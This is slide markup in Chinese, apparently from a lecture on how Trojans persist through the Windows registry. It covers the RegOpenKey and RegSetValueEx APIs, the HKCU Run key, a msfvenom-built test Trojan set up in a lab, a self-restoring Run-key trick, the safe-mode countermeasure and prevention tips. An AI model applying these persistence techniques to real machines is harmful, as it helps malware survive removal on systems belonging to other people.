              <a:t>LONG WINAPI RegOpenKey(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          HKEY hKey,                    //需要打开的主键的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          LPCTSTR lpSubkey,       //需要打开的子键的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          DWORD ulOptions,        //保留,设为0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          REGSAM samDesired,   //安全访问标记,也就是权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>          PHKEY phkResult         //指向一个变量的指针，该变量保存打开将要打开键的句柄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   )</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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重要函数</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075055" y="1880870"/>
            <a:ext cx="10089515" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RegSetValueEx函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   在注册表项下设置指定值的数据和类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LONG WINAPI RegSetValueEx(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           HKEY hKey,                      //指定一个已打开句柄或标准项名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           LPCTSTR lpValueName,  //指向一个字符串的指针，该字符串包含设置值的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           DWORD Reserved,          //保留值,必须强制为0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           DWORD dwType,             //指定存储的数据类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           const BYTE *lpData,         //指向一个缓冲区,包含指定名称存储的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           DWORD cbData                //指定由lpData参数指向的数据大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，单位是字节</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>      )</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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现</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075055" y="1880870"/>
            <a:ext cx="10089515" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>靶机win10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>注册表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Run</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击机制作木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>virus_test.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>），并复制到靶机上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398905" y="2813050"/>
            <a:ext cx="9182100" cy="1698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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现</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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="436245" y="929640"/>
            <a:ext cx="11442065" cy="57010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木马生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具生成简单的木马攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现</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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="318770" y="1751965"/>
            <a:ext cx="10175875" cy="1982470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7746365" y="3209925"/>
            <a:ext cx="3531870" cy="2400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注册表技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>延申</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057275" y="1945005"/>
            <a:ext cx="10089515" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用Windows自带的程序：msconfig或注册表编辑器（regedit）都可以将它轻易的删除，所以这种方法并不十分可靠。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可以在木马程序中加一个时间控件，以便实时监视注册表中自身的启动键值是否存在，一旦发现被删除，则立即重新写入，以保证下次Windows启动时自己能被运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>这样木马程序和注册表中的启动键值之间形成了一种互相保护的状态。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>破解方法：以安全模式启动Windows，Windows不会加载注册表中的项目，因此木马不会被启动，相互保护的状况也就不攻自破，因此就可以删除注册表中的键值和相应的木马程序了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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总结：预防木马的常用措施</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445260" y="2094230"/>
            <a:ext cx="10089515" cy="2891790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行实时监控程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及时修补漏洞并关闭可疑的端口</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安装防火墙，经常升级系统和更新病毒库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>不要随意打开来历不明的邮件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，不要随意下载来历不明的软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
